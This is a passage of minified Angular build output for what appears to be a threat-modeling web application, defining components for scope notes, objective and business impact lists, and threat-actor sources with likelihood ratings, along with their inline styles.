super;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"assetButton",2,"vertical-align","super",3,"matTooltip","click"],[2,"float","left"],[3,"disableAsset","marginLeft","highlight-dark","highlight-light","click",4,"ngFor","ngForOf"],[2,"margin-left","20px"],[3,"ngTemplateOutlet","ngTemplateOutletContext",4,"ngFor","ngForOf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[2,"margin","5px","height","calc(100% - 10px)","font-size","small"],[2,"height","100px"],["height","100%","width","100%","viewBox","0 0 100 100","preserveAspectRatio","none"],["d","M50,0 L100,70 L100,100 L0,100 L0,70 Z"],[2,"min-height","200px","overflow","hidden","display","flex","margin-top","5px"],[4,"ngFor","ngForOf"],["style","width: 100%; display: flex; justify-content: center; align-items: center;",4,"ngIf"],[2,"min-height","100px","overflow","hidden"],[1,"assetColumn",2,"width","100%","margin-top","5px","margin-bottom","5px"],[4,"ngIf"],["style","display: block; float: left;",3,"min-width",4,"ngIf"],[1,"assetColumn"],[2,"margin","5px"],[2,"float","left","display","flex","justify-content","center","align-items","center"],[2,"display","block","float","left"],[2,"width","100%","display","flex","justify-content","center","align-items","center"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"isProject","assetGroup","selectedNode","nodeTreeChanged"],[1,"column1"],[1,"prop-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px"],[3,"myData","showAssetGroup"],[1,"referenceTable"],[2,"min-width","10px"],[1,"refDiagramColumn"],["class","refDiagramColumn",3,"borderColor",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",3,"matTooltip","click"],["matTooltipShowDelay","1000","matBadge","!","matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below","matBadgeOverlap","false",3,"matBadgeHidden","matTooltip"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",2,"font-size","small",3,"matTooltip","click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-tab-group",1),he("selectedIndexChange",function(r){return i.SetSelectedTabIndex(r)}),s(3,"\n    "),m(4,"mat-tab"),s(5,"\n      "),ne(6,Jpt,2,3,"ng-template",2),s(7,"\n\n      "),ne(8,h_t,29,18,"ng-template",null,3,d1),s(10,"\n\n      "),ne(11,T_t,27,6,"ng-template",4),s(12,"\n    "),u(),s(13,"\n\n    "),m(14,"mat-tab"),s(15,"\n      "),ne(16,E_t,2,3,"ng-template",2),s(17,"\n      "),ne(18,D_t,15,18,"ng-template",4),s(19,"\n    "),u(),s(20,"\n\n    "),m(21,"mat-tab"),s(22,"\n      "),ne(23,x_t,2,3,"ng-template",2),s(24,"\n      "),ne(25,R_t,39,20,"ng-template",4),s(26,"\n    "),u(),s(27,"\n\n    "),m(28,"mat-tab"),s(29,"\n      "),ne(30,S_t,2,3,"ng-template",2),s(31,"\n      "),ne(32,F_t,43,26,"ng-template",4),s(33,"\n    "),u(),s(34,"\n  "),u(),s(35,"\n"),u()),2&e&&(C(2),V("selectedIndex",i.GetSelectedTabIndex()))},dependencies:[Zi,Ri,_1,Zh,Dp,oa,Hh,da,qh,V1,Mu,Uh,ts,is,Or,Lr,rc,Xo,qo,po,Pa,df,DZ,v5,Xi],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.property-form-field[_ngcontent-%COMP%]{width:300px}.tabGroup[_ngcontent-%COMP%]     .mat-tab-header .mat-tab-labels .mat-tab-label{height:25px}.tabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{min-width:120px}.disable[_ngcontent-%COMP%]{pointer-events:none}.draggable[_ngcontent-%COMP%]{cursor:pointer}.disableAsset[_ngcontent-%COMP%]{opacity:.5}.assetColumn[_ngcontent-%COMP%]{display:block;float:left}.assetButton[_ngcontent-%COMP%]{width:25px;height:25px;line-height:20px;font-size:20px}.assetButton[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:.4}.referenceTable[_ngcontent-%COMP%]{margin:10px}.referenceTable[_ngcontent-%COMP%]   table[_ngcontent-%COMP%], .referenceTable[_ngcontent-%COMP%]   th[_ngcontent-%COMP%], .referenceTable[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{border:1px solid;border-collapse:collapse}.refDiagramColumn[_ngcontent-%COMP%]{max-width:150px}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0;padding:0;cursor:pointer}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-light[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.highlight-dark[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}']}),t})();function V_t(t,a){1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.charscope.notDefined")))}function B_t(t,a){if(1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit;C(1),za("",re(2,2,"general.Notes"),": ",e.length,"")}}function H_t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",9),he("click",function(){const r=be(e).$implicit;return Me(B().selectedArray=r)}),s(1,"\n          "),m(2,"mat-icon",10),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",11),s(6),oe(7,"translate"),u(),s(8,"\n          "),ne(9,V_t,3,3,"div",12),s(10,"\n          "),ne(11,B_t,3,4,"div",12),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedArray===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedArray===e&&i.theme.IsDarkMode),C(6),ke(re(7,7,i.GetArrayName(e))),C(3),V("ngIf",0==(null==e?null:e.length)),C(2),V("ngIf",(null==e?null:e.length)>0)}}function U_t(t,a){if(1&t&&(it(0,"div",18),oe(1,"translate")),2&t){const e=B(2);at("innerHTML",re(1,1,e.GetArrayName(e.selectedArray)+".d"),Uc)}}function q_t(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",13),s(3,"\n          "),m(4,"mat-accordion",14),s(5,"\n            "),m(6,"mat-expansion-panel",15),s(7,"\n              "),m(8,"mat-expansion-panel-header"),s(9,"\n                "),m(10,"mat-panel-title"),s(11),oe(12,"translate"),u(),s(13,"\n                "),m(14,"mat-panel-description"),s(15),oe(16,"translate"),m(17,"mat-icon"),s(18,"info"),u(),s(19,"\n                "),u(),s(20,"\n              "),u(),s(21,"\n\n              "),ne(22,U_t,2,3,"div",16),s(23,"\n            "),u(),s(24,"\n          "),u(),s(25,"\n          "),it(26,"app-notes",17),s(27,"\n        "),u(),s(28,"\n      "),Mt()),2&t){const e=B();C(6),V("expanded",!0),C(5),ct("\n                  ",re(12,7,"general.HowTo"),"\n                "),C(4),ct("\n                  ",re(16,9,e.GetArrayName(e.selectedArray)),"\n                  "),C(7),V("ngIf",e.selectedArray),C(4),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.selectedArray)}}let G_t=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){this.arrays=[],this.charScope.StepProperties.forEach(e=>this.arrays.push(this.charScope[e]))}GetArray(e){return this.charScope.GetProperty(e)}GetArrayName(e){return"pages.modeling.charscope."+this.charScope.StepProperties[this.arrays.indexOf(e)]}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-char-scope"]],inputs:{charScope:"charScope"},decls:32,vars:11,consts:[[2,"margin","10px"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-line","",4,"ngIf"],[2,"margin-left","10px"],[1,"expansion-panel-headers-align"],[2,"margin-top","10px",3,"expanded"],[3,"innerHTML",4,"ngIf"],[3,"showTimestamp","hasCheckbox","strings"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"mat-list",3),s(7,"\n        "),ne(8,H_t,13,9,"mat-list-item",4),s(9,"\n      "),u(),s(10,"\n    "),u(),s(11,"\n    "),m(12,"div",5),s(13,"\n      "),ne(14,q_t,29,11,"ng-container",6),s(15,"\n    "),u(),s(16,"\n  "),u(),s(17,"\n  "),it(18,"mat-divider"),s(19,"\n  "),m(20,"div"),s(21,"\n    "),m(22,"mat-form-field",7),s(23,"\n      "),m(24,"mat-label"),s(25),oe(26,"translate"),u(),s(27,"\n      "),m(28,"textarea",8),he("ngModelChange",function(r){return i.charScope.Description=r}),u(),s(29,"\n    "),u(),s(30,"\n  "),u(),s(31,"\n"),u()),2&e&&(C(6),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(2),V("ngForOf",i.arrays),C(6),V("ngIf",i.selectedArray),C(11),ke(re(26,9,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.charScope.Description))},dependencies:[Zi,Ri,an,Ta,Ea,oa,nn,un,Go,Xa,ts,is,Or,Lr,pp,il,Ec,Dc,tl,wl,jp,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}']}),t})();function j_t(t,a){1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.objimpact.notDefined")))}function Q_t(t,a){if(1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit;C(1),za("",re(2,2,"general.Notes"),": ",e.length,"")}}function $_t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",9),he("click",function(){const r=be(e).$implicit;return Me(B().selectedArray=r)}),s(1,"\n          "),m(2,"mat-icon",10),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",11),s(6),oe(7,"translate"),u(),s(8,"\n          "),ne(9,j_t,3,3,"div",12),s(10,"\n          "),ne(11,Q_t,3,4,"div",12),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedArray===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedArray===e&&i.theme.IsDarkMode),C(6),ke(re(7,7,i.GetArrayName(e))),C(3),V("ngIf",0==(null==e?null:e.length)),C(2),V("ngIf",(null==e?null:e.length)>0)}}function K_t(t,a){1&t&&(it(0,"div",18),oe(1,"translate")),2&t&&at("innerHTML",re(1,1,"pages.modeling.objimpact.DeviceGoals.d"),Uc)}function X_t(t,a){1&t&&(it(0,"div",18),oe(1,"translate")),2&t&&at("innerHTML",re(1,1,"pages.modeling.objimpact.BusinessGoals.d"),Uc)}function Y_t(t,a){1&t&&(it(0,"div",18),oe(1,"translate")),2&t&&at("innerHTML",re(1,1,"pages.modeling.objimpact.BusinessImpact.d"),Uc)}function J_t(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",13),s(3,"\n          "),m(4,"mat-accordion",14),s(5,"\n            "),m(6,"mat-expansion-panel",15),s(7,"\n              "),m(8,"mat-expansion-panel-header"),s(9,"\n                "),m(10,"mat-panel-title"),s(11),oe(12,"translate"),u(),s(13,"\n                "),m(14,"mat-panel-description"),s(15),oe(16,"translate"),m(17,"mat-icon"),s(18,"info"),u(),s(19,"\n                "),u(),s(20,"\n              "),u(),s(21,"\n\n              "),ne(22,K_t,2,3,"div",16),s(23,"\n              "),ne(24,X_t,2,3,"div",16),s(25,"\n              "),ne(26,Y_t,2,3,"div",16),s(27,"\n            "),u(),s(28,"\n          "),u(),s(29,"\n          "),it(30,"app-notes",17),s(31,"\n        "),u(),s(32,"\n      "),Mt()),2&t){const e=B();C(6),V("expanded",!0),C(5),ct("\n                  ",re(12,9,"general.HowTo"),"\n                "),C(4),ct("\n                  ",re(16,11,e.GetArrayName(e.selectedArray)),"\n                  "),C(7),V("ngIf",e.selectedArray===e.objImpact.DeviceGoals),C(2),V("ngIf",e.selectedArray===e.objImpact.BusinessGoals),C(2),V("ngIf",e.selectedArray===e.objImpact.BusinessImpact),C(4),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.selectedArray)}}let Z_t=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){this.arrays=[this.objImpact.DeviceGoals,this.objImpact.BusinessGoals,this.objImpact.BusinessImpact]}GetArray(e){return this.objImpact.GetProperty(e)}GetArrayName(e){let i="pages.modeling.objimpact.";return e==this.objImpact.DeviceGoals?i+"DeviceGoals":e==this.objImpact.BusinessGoals?i+"BusinessGoals":e==this.objImpact.BusinessImpact?i+"BusinessImpact":void 0}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-obj-impact"]],inputs:{objImpact:"objImpact"},decls:32,vars:11,consts:[[2,"margin","10px"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-line","",4,"ngIf"],[2,"margin-left","10px"],[1,"expansion-panel-headers-align"],[2,"margin-top","10px",3,"expanded"],[3,"innerHTML",4,"ngIf"],[3,"showTimestamp","hasCheckbox","strings"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"mat-list",3),s(7,"\n        "),ne(8,$_t,13,9,"mat-list-item",4),s(9,"\n      "),u(),s(10,"\n    "),u(),s(11,"\n    "),m(12,"div",5),s(13,"\n      "),ne(14,J_t,33,13,"ng-container",6),s(15,"\n    "),u(),s(16,"\n  "),u(),s(17,"\n  "),it(18,"mat-divider"),s(19,"\n  "),m(20,"div"),s(21,"\n    "),m(22,"mat-form-field",7),s(23,"\n      "),m(24,"mat-label"),s(25),oe(26,"translate"),u(),s(27,"\n      "),m(28,"textarea",8),he("ngModelChange",function(r){return i.objImpact.Description=r}),u(),s(29,"\n    "),u(),s(30,"\n  "),u(),s(31,"\n"),u()),2&e&&(C(6),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(2),V("ngForOf",i.arrays),C(6),V("ngIf",i.selectedArray),C(11),ke(re(26,9,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.objImpact.Description))},dependencies:[Zi,Ri,an,Ta,Ea,oa,nn,un,Go,Xa,ts,is,Or,Lr,pp,il,Ec,Dc,tl,wl,jp,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();const egt=["nameBox"];function tgt(t,a){if(1&t){const e=Ye();m(0,"button",10),he("click",function(){const r=be(e).$implicit;return Me(B().AddExistingSource(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function igt(t,a){if(1&t&&(m(0,"div",24),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t){const e=B().$implicit,i=B();C(1),za("",re(2,2,"general.Likelihood"),": ",re(3,4,i.GetLMHName(e.Likelihood)),"")}}function agt(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",22),he("click",function(){const r=be(e).$implicit;return Me(B().selectedSource=r)}),s(1,"\n          "),m(2,"mat-icon",23),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",24),s(6),u(),s(7,"\n          "),ne(8,igt,4,6,"div",25),s(9,"\n          "),m(10,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteSource(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedSource===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedSource===e&&i.theme.IsDarkMode),C(6),ke(e.GetLongName()),C(2),V("ngIf",e.Likelihood),C(2),at("matTooltip",re(11,7,"general.Delete"))}}function ngt(t,a){if(1&t){const e=Ye();m(0,"button",36),he("click",function(){return be(e),Me(B(2).selectedSource.Name="")}),oe(1,"translate"),s(2,"\n              "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n            "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function ogt(t,a){1&t&&(m(0,"mat-hint",37),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n              ",re(2,1,"messages.error.numberAlreadyExists"),"\n            "))}function rgt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),m(2,"div",27),s(3,"\n          "),m(4,"mat-form-field",28),s(5,"\n            "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n            "),m(10,"input",29,30),he("ngModelChange",function(n){return be(e),Me(B().selectedSource.Name=n)}),u(),s(12,"\n            "),ne(13,ngt,6,3,"button",31),s(14,"\n          "),u(),s(15,"\n          "),m(16,"mat-form-field",32),s(17,"\n            "),m(18,"mat-label"),s(19),oe(20,"translate"),u(),s(21,"\n            "),m(22,"input",33),he("ngModelChange",function(n){return be(e),Me(B().selectedSource.Number=n)}),u(),s(23,"\n            "),ne(24,ogt,3,3,"mat-hint",34),s(25,"\n          "),u(),s(26,"\n          "),it(27,"br"),s(28,"\n          "),it(29,"app-threat-actor",35),s(30,"\n        "),u(),s(31,"\n      "),Mt()}if(2&t){const e=B();C(7),ke(re(8,9,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedSource.Name),C(3),V("ngIf",e.selectedSource.Name),C(6),ke(re(20,11,"general.Number")),C(3),at("matTooltip",e.selectedSource.Number),V("ngModel",e.selectedSource.Number),C(2),V("ngIf",e.selectedSource.CheckUniqueNumber()),C(5),V("threatActor",e.selectedSource)}}let sgt=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){}AddSource(){let e=this.dataService.Project.CreateThreatActor();return this.threatSources.AddThreatActor(e),this.selectedSource=e,setTimeout(()=>{this.nameBox&&this.nameBox.nativeElement.select()},250),e}AddExistingSource(e){const i=this.AddSource(),n=i.Number;i.CopyFrom(e.Data),i.Number=n,i.Data.origID=e.ID}GetPossibleThreatSources(){return this.dataService.Config.GetThreatActors().filter(e=>!this.threatSources.Sources.map(i=>i.Data.origID).includes(e.ID))}DeleteSource(e){this.selectedSource==e&&(this.selectedSource=null),this.dataService.Project.DeleteThreatActor(e)}ResetNumbers(){const e=this.threatSources.Sources;for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}drop(e){Qs(this.threatSources.Data.sourceIDs,e.previousIndex,e.currentIndex)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-sources"]],viewQuery:function(e,i){if(1&e&&Mi(egt,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},inputs:{threatSources:"threatSources"},decls:95,vars:44,consts:[[2,"margin","10px"],[1,"expansion-panel-headers-align"],[2,"margin","10px 0",3,"expanded"],[3,"innerHTML"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["cdkDrag","",3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["cdkDrag","",3,"click"],["mat-list-icon",""],["mat-line",""],["mat-line","",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin-left","10px"],["appearance","fill",1,"property-form-field"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],[3,"threatActor"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-accordion",1),s(3,"\n    "),m(4,"mat-expansion-panel",2),s(5,"\n      "),m(6,"mat-expansion-panel-header"),s(7,"\n        "),m(8,"mat-panel-title"),s(9),oe(10,"translate"),u(),s(11,"\n        "),m(12,"mat-panel-description"),s(13),oe(14,"translate"),m(15,"mat-icon"),s(16,"info"),u(),s(17,"\n        "),u(),s(18,"\n      